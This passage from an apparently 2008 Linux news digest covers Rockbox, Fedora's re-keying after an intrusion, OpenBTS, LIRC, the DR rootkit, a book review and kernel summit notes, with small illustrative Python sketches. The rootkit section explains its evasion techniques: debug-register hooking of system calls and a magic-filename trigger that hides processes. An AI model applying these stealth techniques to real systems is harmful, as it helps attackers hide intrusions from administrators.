performed a valuable service for Debian developers who would otherwise have
to struggle to find a project with longer release cycles than their own.

Perhaps that state of affairs is about to change.  Back in July, the
project announced that, once again, an
attempt was to be made for a 3.0 release.  On August 15, Rockbox went into feature freeze, with the 3.0 release
planned for "within a couple (as in two) weeks."  That, of course, was a
few (as in three) weeks ago, but this release is clearly getting closer.

Now would seem like the time for the project to begin its hype campaign
with lots of screenshot-heavy articles on all of the features this major
release will bring.  Evidently the Rockbox developers have some strange
ideas about actually working on the code, though; they haven't gotten
around to the promotional side of things yet.  So, while the Rockbox manual is reasonably
comprehensive and current, it's hard to come up with a list of changes for
the 3.0 release.

At the top of any list would have to be the list of supported players,
which has expanded considerably since the 2.5 release.  The Rockbox
buyer's guide gives a good summary of the currently-supported players.
Alas, none of these players are currently in production, though some can
still be found on auction sites and elsewhere.  There is progress toward
support for some more contemporary players; early successes have been
announced for the Cowon iAudio D2 and iAudio i7 devices.  Those players will
not be supported in the 3.0 release, of course, and the Rockbox developers
have reserved the right to withhold support for other players as well if it
is not stable enough.

Beyond that, changes to Rockbox in recent times include the ever-growing list
of codecs (including some video formats on suitable players), a
five-band parametric equalizer, an increasingly powerful theme capability
with many
user-contributed themes, album art display, a highly capable tag
database, Speex codec support for the
voice-based interface, and a whole host of new plugins including the
much-anticipated Lamp
plugin which displays a blank screen at full intensity, turning your
player into an expensive, short-lived flashlight.  Rockbox 3.0, it
seems, will have something for almost everybody.



It also appears that 3.0 may include the hard-to-find RBUtil program - a
Qt-based tool which automates the process of installing Rockbox.  Given
that installation can be a bit of a sweaty-palms experience overshadowed by
the fear of turning that nice, new player into a brick, any help which can
be given is more than welcome.  Bricks, after all, are not known for
high-fidelity sound.

Another recent event in the Rockbox community is the creation of the Rockbox
Steering Board, currently consisting of Daniel Stenberg, Linus Nielsen
Feltzing, Dave Chapman, Paul Louden, and Jens Arnold.  The mandate for this
board is not particularly clear; it seems to be intended to help break
deadlocks in technical discussions.  There have been some concerns raised that the creation of this
board is a sign that Rockbox is moving into a more bureaucratic,
slow-moving mode, but those worries are probably premature.

Rockbox developers also recently decided
that all of the project's code would be licensed as "GPLv2 or later."
While there is no plan for Rockbox to switch to GPLv3, the developers
wanted their code to be available to other projects which are using that
license.  Since Rockbox does not require copyright assignments, this change
will require an audit to find any GPLv2-only code and either relicense it
or remove it.  There have been no public announcements on how that process
is going.

The Rockbox project faces a number of challenges.  Cooperation from vendors
is essentially zero, so all ports require a reverse engineering effort.
Target platforms go through their market lifecycle quickly, making it
difficult to get a port stable before the target device disappears.  Its
programming environment is highly specialized and resource-constrained,
limiting the pool of developers who can work on the project.  And, someday,
the whole effort may lose its relevance as platforms become more capable
and it gets easier to just run Linux on them.  For now, though, there is
nothing better for those who want a dynamic and user-oriented operating
system for their digital audio player, and it continues to improve.

		Fedora distributes new keys


The Fedora project is back on track after its recent "infrastructure 
issues" with new package signing keys as well as packages and updates
signed with the new keys.  Fedora users should be able to pick up the new
key and update their systems now, with a minimum of hassle—just
verifying and 
accepting the new key.  But, no further information has been released about
exactly what went wrong, leading to more speculation and
some worry in the Fedora community.


When a user gets a package from their distribution—or, more likely, a
mirror of their distribution repository—they need to have some way to
determine that it is a valid package.  Distributors sign packages using a
private key; that signature can then be verified by using the
distribution's public key.  If the private key gets compromised somehow,
malicious packages could be created that would be indistinguishable from
the real versions.  This is why private signing keys must be well guarded,
usually by isolating them on separate machines and encrypting them with a
password. 


According to one of the announcements
about the problem, there is no evidence that the passphrase used to guard the
Fedora private signing key has been compromised, though the clear
implication is that the encrypted key file may have been captured.
Out of an abundance of
caution—and perhaps the concern that the passphrase might be guessed
or brute-forced—the project decided to generate new keys.  Along with
new keys come various headaches: re-signing all of the packages as well as
getting the keys installed on users' machines.


Getting the keys to users is largely a matter of getting the new
fedora-release package—along with PackageKit and friends for
GUI-enabled updates—installed.  That package contains the new key and
repository name (updates-newkey).  Of necessity, those updates are the last
that will be signed with the old key, so they will install on existing
Fedora systems.  Once that package makes its way out to the mirrors, users
can install it so that they can proceed with any needed updates using the
new key.


Running yum clean metadata was helpful at the time of this writing to
accelerate the process; depending on which mirror is being used and when it
gets updated, that may not be needed.  After fedora-release is
installed, yum list updates gives a long list of updates
available, all signed with the new key.  All a user needs to do is verify
the key and add it to the RPM key database.  Verifying the key is a manual
step as a user must 
check its fingerprint against that published on the web site.  The
method described requires importing the key into gpg, then doing
gpg --fingerprint fedora@fedoraproject.org to see the key
fingerprint; this is clearly something that could be made easier.
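
As one illustration of how the comparison step could be made less error-prone, the sketch below normalizes two fingerprint strings (spacing and case differ between gpg output and web pages) and compares them. It assumes a 40-hex-digit fingerprint; the function names are hypothetical, and the fingerprint shown is a made-up placeholder, not Fedora's.

```python
import hmac
import string


def normalize_fingerprint(text):
    """Drop all whitespace and fold to upper case."""
    return "".join(text.split()).upper()


def fingerprints_match(shown, published):
    """Return True only if both strings are the same 40-digit hex
    fingerprint once spacing and case are ignored."""
    a = normalize_fingerprint(shown)
    b = normalize_fingerprint(published)
    if len(a) != 40 or any(c not in string.hexdigits for c in a):
        return False
    return hmac.compare_digest(a.encode("ascii"), b.encode("ascii"))


# Placeholder value for illustration only; NOT a real key fingerprint.
PLACEHOLDER = "0123 4567 89AB CDEF 0123  4567 89AB CDEF 0123 4567"
```

The fingerprint still has to come from a source the user trusts; a helper like this only removes the chance of misreading forty hex digits by eye.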


As part of phase one of the re-signing, Fedora has re-signed all Fedora 8
and 9 package updates.  Phase two is ongoing, re-signing each package that
is distributed as part of the original release of Fedora 8 and 9.  Fedora
10 already has a new signing key as well.  From the perspective of a
possible compromise of the signing keys, things are well on their way back
to normal.  But there is still the nagging issue of how this all came about to
begin with.


Several different questions about the intrusion were directed at the Fedora
board from 
community members in their IRC meeting on
September 9.  Unfortunately, there was no new information forthcoming,
nor was there any indication of when that information might be available.
According to board member Tom "spot" Callaway, information will be
released "when we're told that we can by the parties running the
investigation, not a second before, and not a second later." 


Red Hat is clearly holding all information about the intrusion as a closely
guarded secret—whether that is at the behest of law enforcement or
just lawyers is unclear.  While there was no timeline given, the clear
sense that one got from the meeting is that it might be weeks or months
before clearance will be granted to even confirm that they know how the
intrusion occurred. 
In addition, the Fedora board has not been officially briefed on the
incident; some members have knowledge because of their Red Hat
responsibilities, but the rest are in the dark.  If one needed a reminder
that Fedora is not an independent distribution, but instead is subject to
the whims of Red Hat, this is a clear demonstration. 


The justification for secrecy is that Red Hat is a publicly traded company
so intrusions into its systems need to be treated differently.  Some board
members believe that had there not been an intrusion into the servers that
handle packages for Red Hat Enterprise Linux—that is if it had only
been Fedora servers that were affected—the incident would have been
handled much more transparently.  Overall, the board is clearly unhappy
about the 
situation but, perhaps because they are almost all Red Hat employees, don't
see that there is much that can be done about it.  That too should serve as
a reminder.


It should be noted that Debian has had several server compromises over the
years, which is, perhaps, a poor
record of server security, but it is an excellent example of
transparency.  Debian is rather well known for its independence, which is
part of what allows it to be so open.  Those incidents do serve as
examples; perhaps they are not an exact fit for the current Fedora/RHEL
intrusion but that remains to be seen.


It may very well be that Red Hat is between a rock and a hard place here.
As a friend to free software, Red Hat is unparalleled, but once in a while
it shows that it is foremost a corporation with responsibilities to its
shareholders.  When those responsibilities conflict with the transparency
we have come to expect from free software projects—especially with
regard to security issues—that transparency must be set aside.  One
can argue that Red Hat is being overly protective of the
details—confirmation that they either know or do not know how the
intrusion occurred for example—but that argument really can't be made
until all the facts are known.  For that we must wait for the process to
run its course.


		The OpenBTS project creates a stand-alone cell phone network 


On September 3, 2008, Harvind Samra
announced
the new
OpenBTS project:


The Open BTS Project is an effort to construct an open-source Unix
application that uses the Universal Software Radio Peripheral (USRP) to
present a GSM air interface ("Um") to standard GSM handset and uses the
Asterisk software PBX to connect calls. The combination of the ubiquitous
GSM air interface with VoIP backhaul could form the basis of a new type of
cellular network that could be deployed and operated at substantially lower
cost than existing technologies in greenfields in the developing world.


OpenBTS is currently a work in progress; released components
(and the associated pile of telecom acronyms) include a
Gaussian minimum-shift keying (GMSK) radio modem
and interface code for the USRP hardware, GSM
forward error correction (FEC) coders and decoders,
GSM L3 message serializers/deserializers, a hybrid GSM/SIP control
layer, and a partial
short message service (SMS) stack implementation.
There are plans for expanding the functionality of the
various components of the code.


The fairly short project
FAQ
notes a potential legal issue with a proposed workaround solution:
"Although the project founders have built a more complete GSM
BTS (base transceiver station), some of that code may be the subject of a legal dispute. While the authors deny any wrongdoing is this matter, it would still not be prudent to release all of the code in these circumstances... Hopefully, the incomplete parts can be replaced
quickly."


The OpenBTS developers recently ran an alpha-level
system field test
at the 2008 Burning Man
art/technology festival in the Nevada desert.
They applied for and received a temporary FCC license,
memorialized by
this poster, in order to keep everything legal with the licensing
authorities.  Around $7000 worth of
radio equipment was assembled.
To top it off, everything was powered by a small wind generator and
a 12V battery.


A WiFi backhaul connection was made to a nearby satellite ground
station to provide VoIP connectivity to the external world.
Some interesting technical problems were encountered, including
being flooded by connections from active cell phones that were
looking for connection points when the system was first activated.
Another issue discovered was a "security hole" involving unlimited
external long distance dialing.
After sorting through the various issues, the system was declared
operational.
Many in-system and external voice and text connections were
made, and the alpha test was declared a success.


The live field test resulted in exposing a lot of real-world problems
that led to numerous code improvements.  There's no doubt that
sitting in a tent in a hot and windy desert is a fairly
difficult environment to develop code in, but progress was made
nonetheless.
The OpenBTS project illustrates the kind of technical advances that
can be made by a small but dedicated group of people using open-source
software and open hardware.


		LIRC delurks


The Linux Infrared Remote Control project
(LIRC) provides drivers for a number of infrared receivers and
transmitters.  It is, perhaps, most heavily used by people running MythTV
and similar packages; it would, after all, completely ruin the experience
to have to get up from the couch to change channels.  Despite their
established user base, and despite the fact that a number of distributors
ship the code, the LIRC drivers have never found their way
into the mainline kernel.  In more recent times, little effort has gone
into their development and maintenance; the link to "Caldera OpenLinux" on
the project's web site would seem to make that clear.


But LIRC is useful code, and, as is the case with most out-of-tree drivers,
most people would really rather see LIRC in the mainline kernel.  Merging
into the mainline got a step closer on September 9, when Jarod Wilson
posted a version of the LIRC
drivers for consideration.  Jarod, it seems, has been working (with
Janne Grunau) on these drivers for some months; in the process, they have
eliminated "tens of thousands" of complaints from the checkpatch.pl script
and cleaned up a number of things.


Even after that work, though, the LIRC drivers are clearly not yet up to
normal kernel standards.  Some very strange coding conventions are used in
places.  Many of the drivers have broken (or completely absent) locking.
Duplicated code abounds.  One driver has implemented a command parser in
its write() function.  Another driver is for hardware which
already has a different driver in the mainline.  And, importantly, these
drivers do not work with the input subsystem.


In the past, Linus Torvalds (and others) have argued for merging drivers as
soon as possible.  If the code is poor, its chances of being improved get
much higher once it's in the mainline and others can fix it.  The LIRC
drivers would appear to strongly support the notion that out-of-tree code
is, almost by necessity, worse code.  These drivers have been around for
almost a decade, have been packaged by distributors, and have been used by
large numbers of people.  Despite all of that, they contain a large number
of serious problems which have never been addressed.


Now that the drivers have been posted to the linux-kernel list, quite a few
of these problems are being pointed out; Jarod and Janne have been
responding to reviews and fixing the issues.  The "merge drivers early"
philosophy would argue for pushing LIRC into 2.6.28, even if serious problems
remain.  Presence in the mainline will raise the visibility of the code,
inspiring (one hopes) more developers to work on fixing it up.  Merging
LIRC will also free distributors from the need to create separate packages
for those drivers.


One important question will have to be addressed before merging LIRC can be
seriously considered, though: its user-space API.  Once LIRC is merged, its
user-space API will be set in stone, so any problems with that API need to
be resolved first.  LIRC, being out of the mainline, did not follow the
development of the input subsystem, so it does not behave like other input
drivers - even in-tree drivers for infrared remotes.  The use of an in-kernel
command-line parser in at least one driver is sure to raise eyebrows; that
sort of interaction should really be handled via ioctl() or sysfs.
All told, it is hard to imagine this code being merged until the API
problems have been resolved.
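
To make concrete what "behaving like other input drivers" means for user
space, here is a minimal sketch of how a program might decode events
read from an input device node.  It assumes the 64-bit Linux layout of
struct input_event (two native longs for the timestamp, then type, code,
and value); the sample event is fabricated for illustration and does not
come from any LIRC driver.

```python
import struct

# Assumed layout of struct input_event on a 64-bit Linux system:
# timestamp seconds, timestamp microseconds, type, code, value.
EVENT_FORMAT = "llHHi"
EVENT_SIZE = struct.calcsize(EVENT_FORMAT)

EV_KEY = 0x01        # event type used for keys and buttons
KEY_VOLUMEUP = 115   # key code from linux/input-event-codes.h

KEY_STATES = {0: "released", 1: "pressed", 2: "repeated"}


def decode_event(raw):
    """Decode one raw input event into a small dictionary."""
    seconds, microseconds, ev_type, code, value = struct.unpack(EVENT_FORMAT, raw)
    return {
        "time": seconds + microseconds / 1_000_000,
        "type": ev_type,
        "code": code,
        "value": value,
    }


def describe(event):
    """Return a readable description of a key event, or None otherwise."""
    if event["type"] != EV_KEY:
        return None
    state = KEY_STATES.get(event["value"], "unknown")
    return "key %d %s" % (event["code"], state)


# A made-up event standing in for EVENT_SIZE bytes read from a device node.
sample = struct.pack(EVENT_FORMAT, 1221000000, 0, EV_KEY, KEY_VOLUMEUP, 1)
print(describe(decode_event(sample)))   # key 115 pressed
```

A remote handled this way looks to applications like any other keyboard,
so no remote-specific API is needed to read a button press.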


Changing the LIRC API will, of course, lead to problems of its own.  There
is user-space code which depends on the current API; any changes will break
that code.  The kernel community will certainly understand this problem,
but is unlikely to be swayed by it.  There are a number of risks associated
with maintaining production kernel code out of the mainline tree; one of
those risks is that your established APIs will not be accepted by the
kernel development community.  So an API change may simply be part of the
cost of getting LIRC into the mainline at this late date.


It should be a cost worth paying.  Once LIRC is in the mainline, interested
developers will work to continue to bring the code up to kernel standards.
The community will maintain it going forward.  All Linux users will get the
LIRC drivers with their kernel, with no need to deal with external
packages.  Getting there may be a bit frustrating for users of remotes and
(especially) for the developers who have taken on the task of getting this
code into the mainline.  But, once it's done, remotes will just be more
normal hardware, supported by the kernel like everything else.

		DR rootkit released under the GPL


A free software Linux rootkit has been announced with a number of
interesting features.  Its availability may, unfortunately, help lower the bar
for "script kiddies" and others, but it also provides a nice look into what
makes up a rootkit.  The rootkit, called DR for Debug Register, uses some
new techniques to evade 
detection, such that even a change recently proposed for inclusion in the
kernel would have missed it.


A rootkit is malware that typically hooks into the kernel to hide its
presence from administrators.  Usually, rootkits can hide their processes
from /proc, which in turn means ps won't see them, but
sophisticated rootkits do much more than that.  DR can also hide network
sockets and files in the filesystem that are associated with rootkit processes.
There are some benefits to this approach as
the announcement describes:

The major benefit of the DR rootkit is that all this happens
transparently to the end user. The children of a hidden process are also
automatically hidden. The sockets a hidden process creates are also
hidden. But if you are a hidden process, you can see hidden resources.
This makes the DR rootkit nicely manageable.
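
The /proc hiding described above suggests a simple consistency check:
compare the process IDs that a directory listing shows with the ones
that answer a direct probe.  The sketch below is an illustration of that
idea only.  The function names are hypothetical, and whether such a
check would catch DR depends on which system calls it hooks, which the
announcement summary here does not spell out.

```python
import os


def pids_from_entries(entries):
    """Keep only the directory names that look like process IDs."""
    return sorted(int(name) for name in entries if name.isdecimal())


def listed_pids(proc_dir="/proc"):
    """PIDs visible in a directory listing, which is what ps relies on."""
    return pids_from_entries(os.listdir(proc_dir))


def answers_probe(pid):
    """True if signal 0 can be addressed to pid, meaning it exists."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True   # the process exists but belongs to another user
    return True


def suspicious_pids(listed, answering):
    """PIDs that answer a probe but are absent from the listing."""
    return sorted(set(answering) - set(listed))


# Synthetic data: PID 99 answers a probe but never shows up in the listing.
print(suspicious_pids([1, 7], [1, 7, 99]))   # [99]
```

On a real system this comparison produces false positives: thread IDs
answer the probe without appearing in the top-level /proc listing, and
processes can start or exit between the two steps.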


Unlike many rootkits, DR does not alter the system call table directly.
Instead it sets a hardware breakpoint for the syscall_call()
function which gets called whenever a system call is made.  When that
breakpoint is reached, a handler is set up to watch for an access to the
memory location where the specific system call's function pointer lives
(i.e. syscall_table[__NR_syscall]).  When the address is retrieved
from that location, the breakpoint substitutes the address of the code the
rootkit wants to run—the system call hook.
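
The effect of that substitution can be modeled in a few lines.  The
following is a toy model, not DR's code: the class and function names
are invented for illustration, and a dictionary stands in for the system
call table.  It shows why a checker that only verifies the table's
contents would see nothing wrong.

```python
def real_list_directory(path):
    """Stand-in for an unmodified system call implementation."""
    return ["notes.txt", "rootkit.ko"]


def hooked_list_directory(path):
    """Stand-in for a hook that filters the real call's results."""
    return [name for name in real_list_directory(path)
            if not name.startswith("rootkit")]


class WatchedTable:
    """A table whose reads can be intercepted without changing its contents."""

    def __init__(self, entries):
        self.entries = dict(entries)
        self.watches = {}   # slot name -> replacement handed out on read

    def watch(self, slot, replacement):
        """Model a breakpoint on reads of one slot."""
        self.watches[slot] = replacement

    def fetch(self, slot):
        """Model the dispatcher fetching a function pointer from the table."""
        return self.watches.get(slot, self.entries[slot])


table = WatchedTable({"list_directory": real_list_directory})
snapshot = dict(table.entries)
table.watch("list_directory", hooked_list_directory)

print(table.entries == snapshot)              # True: the table is untouched
print(table.fetch("list_directory")("/"))     # ['notes.txt']
```

The stored entry never changes; only the value seen by the reader does,
which is the property that defeats integrity checks on the table itself.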


The system call hooks are where the work is done to evade detection.  By
hooking less than a dozen different calls, DR can hide its processes,
files, and sockets.  By creating a program that does an exec()
of a special filename—one that starts with
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"—one can set the "hidden" bit on the
process; spawning a shell or running some malware after the exec()
fails will cause those processes to no longer be visible to the rest of the
system. 


There are some limitations outlined in the announcement, the biggest of
which is that DR is implemented as a kernel module without any attempt to
hide its presence.  Doing an lsmod will show it clearly, but there
are other ways to detect it as well.  Fixes for all of those are on the "to
do" list and
won't take a very large effort to complete.


DR was created by Immunity, Inc. as part of their
penetration testing efforts and has been released under the GPLv2.  It
contains roughly 1200 lines of well-documented code that should be of
interest to anyone curious about rootkits.  It is not the first rootkit
available with source code (Adore predates it by several
years and there are probably others), but it is an interesting, if a
bit scary, release.


		Review: Intellectual Property and Open Source


Free software inevitably runs into the body of law known collectively as
"intellectual property."  Many developers do their best to avoid the legal
side of things whenever possible; others seem to like nothing better than
extended debates on the topic.  Regardless of one's own feelings in
the matter, the fact remains that the legal system exists, it affects our
lives, and that we can only be better off if we understand it.  To
that end, O'Reilly has published Intellectual
Property and Open Source by Van Lindberg.

The book starts off with a Lessig-like comparison between code intended for
computers and legal code.  The legal code base is not as clean as one might
like:


	It gets worse: every line of the legal code was written by
	committee, and almost every line of it has been patched by a
	later piece of legislation or modified by a court.  Indeed, IP law
	is rooted in a more than 200-year-old codebase.  Is it any wonder
	it's a mess?


Mr. Lindberg is clearly trying to write for programmers, so code-based
analogies abound.  Patents are like regular expressions - quite powerful in
the technologies they can match, but you never really know what they will
catch until you try them.  Patent documents are structured like ELF program
headers, and the patent system as a whole is a sort of memoization scheme
(we get a Python Fibonacci number generator as an example here).  Contracts
are like a distributed version control system - they let anybody create
their own, localized law.  And so on.
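
For readers who have not met the caching technique behind the Fibonacci
analogy, a generic sketch follows.  It assumes the technique meant is
memoization (remembering results so that they need not be worked out
again), and it is not the example printed in the book.

```python
from functools import lru_cache


@lru_cache(maxsize=None)
def fib(n):
    """Return the n-th Fibonacci number, caching every result computed."""
    if n < 2:
        return n
    return fib(n - 1) + fib(n - 2)


print(fib(30))   # 832040
```

Without the cache, the recursive calls repeat the same work many times
over; with it, each value is computed once and looked up thereafter.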


Roughly the first half of the core part of the book is dedicated to
explaining how the four main branches of intellectual property (patents,
copyright, trademarks, and trade secrets) work.  The chapter on the patent system notes
some of the problems with software patents (in particular, the
industry's use of oral tradition and the late recognition of software patents make most prior
art invisible to investigators), but, to a great extent, it seems to be
written for people who want to obtain patents, rather than those who feel
the need to defend themselves against software patents.  It might have been
nice to get a treatment of the often-quoted idea that software developers
are better off not knowing about patents because that way they cannot be
accused of willful infringement, but that topic was not touched.  There is
also no talk of the Open Invention Network or any other efforts to protect
the community as a whole.


The copyright chapter is a reasonably thorough treatment of the subject
which notes how the scope of copyright has expanded over the years.
The current situation is compared to an "allow by default" security policy
where anything which can be said to have an expressive aspect gets
copyright protection by default.

Derivative works are discussed at length, leading to this interesting
observation:


	The copyright complexity of open source software systems is in
	large part due to the rules surrounding derivative works.  A large
	project like the Linux kernel has hundreds or thousands of
	authors...  As a result, nobody really owns the Linux
	kernel; the best description of its status is that it is owned
	jointly by its developers.


Just a few pages earlier, it is stated that joint ownership means that each
author has full rights over the entire work and can do just about anything
with it - like license it to others.  A finding that the kernel was a joint
work could lead to some unpleasant consequences; one hopes that Mr.
Lindberg is not really saying that could happen.


The book mentions the abstraction-filtration-comparison test used by some
courts to determine if one body of code is derived from another, but says
nothing about how that test works.  It would have been nice to learn a bit
more, since that is an important part of how copyright cases are resolved
in the US.  Also nice would have been some discussion of the value of
registration of copyrights.

The chapter finishes with this discouraging note:


	Under a legal realist analysis, any use of copyrighted material
	that was objectionable or questionable would be struck down as
	infringing.  Non-objectionable use of copyrighted material would be
	allowed only if the political and economic interests in support of
	the use were more powerful than the political and economic
	interests against the use.  Unfortunately, this is, in my opinion,
	the best guide to the outcome of any future copyright case.


The discussion of trademarks (compared to desktop shortcut icons) is pretty
much as one would expect.  The chapter is more concerned with obtaining and
defending trademarks than balancing trademarks against the ideals of free
software.  There is not much to say about trade secrets, though the chapter
does touch on what happens if unreleased code is incorporated into a free
application.   The author concludes that the open development process makes
this kind of contamination less likely than with proprietary projects.

Next we move into a chapter on contracts and licenses which talks mostly
about how contracts are formed and enforced.  The book takes a strong
position that all licenses are contracts; they are just a special form of
contract which grants permission to use some sort of intellectual
property.  The other point of view (that licenses are distinct from
contracts) is touched upon, but dismissed this way:


	The "pure license" interpretation favored by Eben Moglen makes the
	enforcement of the GPL much easier, there is no need to consider
	offers, or acceptances, or the other particulars of contract law
	discussed in this chapter.  Unfortunately, it is impossible to say
	for certain if a particular agreement will be considered a license,
	a contract, or considered both a contract and a license.  It is a
	tricky and case-specific question focused on whether the agreement
	includes a "restriction on the scope" of permissible action or
	whether it is simply a "covenant" to act in a certain way.


Later on, the author refers to the GPL in particular as a
"Schrödinger's license" with a currently undetermined nature; it might
be "just a license" after all.  Clearly
there is some confusion on this point.  It is worth noting that the book
predates the appeals court decision in the JMRI
case, which makes the "it's a license" interpretation far more likely.


There is a chapter on the "economic and legal foundations of open source,"
talking about how the community works and, in particular, how free licenses
work.  There is little here which would be new to most LWN readers, but it
might be good to hand to the corporate legal office.  Speaking of that
office, the next chapter talks about how to contribute to a project without
getting into trouble with your employer.  There is talk about proprietary
information agreements, some important cases (including the Medsphere case,
which your editor wishes had been more prominent on his radar), works for
hire, and so on.  The key advice from the author is to disclose your work
and your ideas to your employer as soon as possible - preferably before
beginning employment.  This is a chapter that many free software developers
should read.

Chapter 10 is about choosing a license for a free software project.  The
importance of the topic is stressed - as is the importance of not trying to
write one's own license.  The author recommends that most projects should
limit themselves to considering the 2-clause BSD license, the Apache
license (v2), the Mozilla Public License, the GPL or LGPL (versions 2 or 3,
though GPLv3 is said to be "a better and surer foundation for future
development"), or the Open Software License (v3).

Chapter 11 is about the issues involved in accepting patches from others.
The author strongly recommends using some sort of signed contributor
agreement or even copyright assignments.  Getting assignments, he says,
allows for "unified legal control," ease of relicensing, and the ability to
do commercial licensing.  It's probably good advice for a strongly
corporate-controlled project, but may not fit with more community-oriented
projects.  Unfortunately, the book perpetuates this
particular fiction:


	In order to represent a code base against legal challenges, a
	single entity must have copyright ownership of all the code in that
	project.


And, to make it worse:
	

	A good example of this is the BusyBox project...  When people found
	out that BusyBox was being distributed in proprietary products
	without adherence to the license restrictions, the Software Freedom
	Law Center (SFLC) was able to file suit on behalf of the project
	because there were only two people that owned all the copyrighted
	code.


There are a few problems here.  No single entity owns the entire Linux
kernel, but that code has been quite vigorously defended against some
strong legal challenges.  (It is interesting, actually, that the author
managed to write this entire book without mentioning SCO once.)  Kernel
developers have also been able to enforce the kernel's copyright numerous
times.  Meanwhile, a quick look at the BusyBox code is sufficient to turn
up copyright assertions from far more than two developers.
Unified ownership of a
code base may be the right thing for some projects, but the reasons cited
here are clearly not applicable.

That complaint notwithstanding, this chapter does contain useful
information that should be kept in mind when accepting patches from
others.

Chapter 12 is about the GPL in particular.  There is a lot of talk about
just what is a derived work under the GPL - does it apply to kernel
modules, for example?  Unfortunately, the answer is "we just don't know."
So, while the chapter is a reasonable summary of how the GPL works, once
again there will be little there for most LWN readers.

Chapter 13 gets into reverse engineering, providing a quick overview of how
it can be done without getting into trouble.  According to the book,
reverse engineering is generally allowed in the US, even to the point of
disassembling proprietary code to learn its secrets.  There are a lot of
pitfalls, though, and the DMCA changes the game significantly.  This
chapter is a good starting point, but anybody wanting to do reverse
engineering in the US will probably want to learn rather more than what is
on offer here.

The final chapter talks about the creation of a non-profit corporation to
own and/or manage a code base.  It's mostly about what's required to
create a corporation and keep it in good standing.  This information may be
useful to some, but it seems a little out of place here.  After that, there
are 80 pages of license lists and the full texts of a number of free
software licenses.  Perhaps it's useful reference material, but it's all
easily available online; it's not clear that dedicating nearly 25% of the
book to this material was necessary.


The subtitle of this book is "a practical guide to protecting code," which
makes one omission especially striking: there is not a word on how a
project should deal with license violations.  There is, by now, a fair
amount of collective wisdom on how such problems should be approached, but
it has not been collected here.  There's also little talk on protecting
projects against software patent problems, no talk of patent pools, and no
talk of related issues like the Microsoft/Novell deal.  Software patents
have cast a big shadow over free software in the US, but the issue is not
really touched upon in this book.


It is also worth noting that the book is very heavily based on US law, and
the author never attempts to look beyond the border.  Certainly it would
never have been possible to cover intellectual property law worldwide, but
this narrow focus is still a little puzzling.  Much intellectual property
law in the US is based on international agreements, so an understanding of
those agreements would help with the larger picture.  A mention of the Berne
Convention would not have been out of place, for example.  The other
problem is that free software tends to have little respect for borders;
there are few projects which are limited to a single country.  Even if a
project is based in the US, the existence of contributors elsewhere in the
world is almost certain.  Free software is a global phenomenon; it is not
sufficient to think about US law alone.

Despite these complaints, your editor has to say that this is a valuable
book.  It covers many of the basics of the law in a much clearer way than
has been done before.  Anybody who manages or contributes to a free software
project (in the US, at least) should be familiar with the concepts
discussed here.  And certainly all of the people peppering the net with
IANAL posts would be better informed after reading Intellectual Property
and Open Source.  This book should bring some light to a complex but
crucially important part of the legal code which governs our actions, and
that is a good thing.

		KS2008: Linux 3.0


Prior to this year's kernel summit, Alan Cox had suggested a possible
topic: devote a development cycle to the removal of old, unused features -
possibly breaking compatibility in places - and release the result as
Linux 3.0.  Alan did not attend the summit itself (the fact that it is
being held in the U.S. was enough to ensure that), but his suggested topic
was the first order of business.  The result: it looks like there is no Linux 3.0
forthcoming right away, and the removal of older features is not on the
agenda.

There was some talk about the cost of maintaining older drivers and
interfaces which are used by few people.  This code requires updates for
API changes and may contain security holes.  In many cases, the drivers are
for hardware which is unable to support features needed by contemporary
software, with the result that users complain about tools like PulseAudio
not working properly.

Linus came into the discussion early to state his unhappiness with the
idea.  The cost of maintaining these old drivers, he asserts, is
essentially zero.  And, in places where there are costs, that is OK with
him as well.  In particular, it's fine with Linus if API changes are a
pain; he wants developers to have to think about whether an API change is
worth the trouble or not.

Linus also pointed out that a lot of hardware which kernel developers see
as being useless junk is, in fact, still useful in many parts of the
world.  There are a lot of people using old stuff, and he does not want to
pull the rug out from under them.  He is also not concerned about claims of
possible security problems with the older code; should such problems exist,
he says, they will affect so few people that it's really not worth the
trouble for any self-respecting cracker to exploit.  So, he concluded, any
sort of driver removal might end up getting rid of all of five drivers,
which is probably not worth the effort.


James Bottomley expressed concern that, by disclaiming concern about things
like security issues, we could be creating a two-tier system of support.
Older hardware may be nominally supported, but no developers are really
interested in keeping the code up, and nobody has the hardware to test
it.

Christoph Hellwig pointed out that creating a major release which only
removed features would be a "marketing disaster."


From there, the discussion began to drift a bit.  Dave Jones suggested (to
general applause) that
a useful thing to deprecate would be the "deprecated" marker used within
the kernel source.  Deprecated functions generate large numbers of
warnings, but nobody bothers to fix them; all the deprecation warnings
really do is mask other, more important warnings.  Christoph noted that the
checkpatch.pl script can also warn about deprecated functions, and that it
was a much better place for it: there, the warnings affect the person
submitting a patch instead of everybody building a kernel.


Then it was suggested that, perhaps, a concerted effort should be made
toward the removal of all warnings from the kernel build.  That idea did
not get very far either.  Quite a few warnings from GCC are bogus, in that
they are complaining about entirely valid code.  Fixing warnings like that
risks masking other problems and introducing bugs in its own right.
Christoph suggested that the warning issue could only really be resolved
when we start shipping GCC with the kernel source.


The sparse tool was discussed for a bit; the warnings generated by sparse
are seen as being more useful much of the time.  But, as Linus noted,
sparse has its own set of bogus diagnostics and is not a perfect solution
either.


Heading back toward the original topic, the developers talked about the
maintenance of ancient system call compatibility interfaces.  Linus talked
about how nice it is to know that we can still run binaries from 1991; we
should be proud of that fact.  The associated cost is, once again, quite
small.  Matt Mackall then said that, if we are continuing to maintain those
interfaces forever, there is little point in discussing the removal of
other interfaces.


The end result from this discussion would appear to be that there will be
no change.  Compatibility with old hardware and interfaces remains a
priority for the kernel, especially as long as the cost of retaining that
compatibility is small.

		KS2008: Minisummit reports


There is an increasing trend toward the use of "minisummits" for the
detailed discussion of issues specific to a kernel subsystem.  Kernel
summits typically include a slot where the results from these sessions can
be reported back to the group as a whole.  The results from three such
events were discussed at the 2008 kernel summit.

Power management

Len Brown went over the power management summit held last July in Ottawa;
some notes from that
gathering were posted here in August.  The talk started with a quick
recap of recent events in the power management area; these include the
mainstream adoption of the tickless kernel, the establishment of lesswatts.org, and the creation of acpica.org, which, among other things,
contains public bugzilla and git servers for the ACPI reference
implementation.

The number of unresolved bugs in the ACPI subsystem is dropping; it was 222
in 2004, but is 59 now (though one should count the 45 bugs which have been
pushed out to a separate suspend/resume category).  New bugs continue to
come in at a steady rate, but the ACPI developers have been working at
addressing them and simultaneously taking care of the backlog.  Most of the
bugs, Len notes, are problems which have always been present in the code;
very few of them are regressions being added by current work.  Andi Kleen
(who was the ACPI maintainer while Len took a short sabbatical) made the
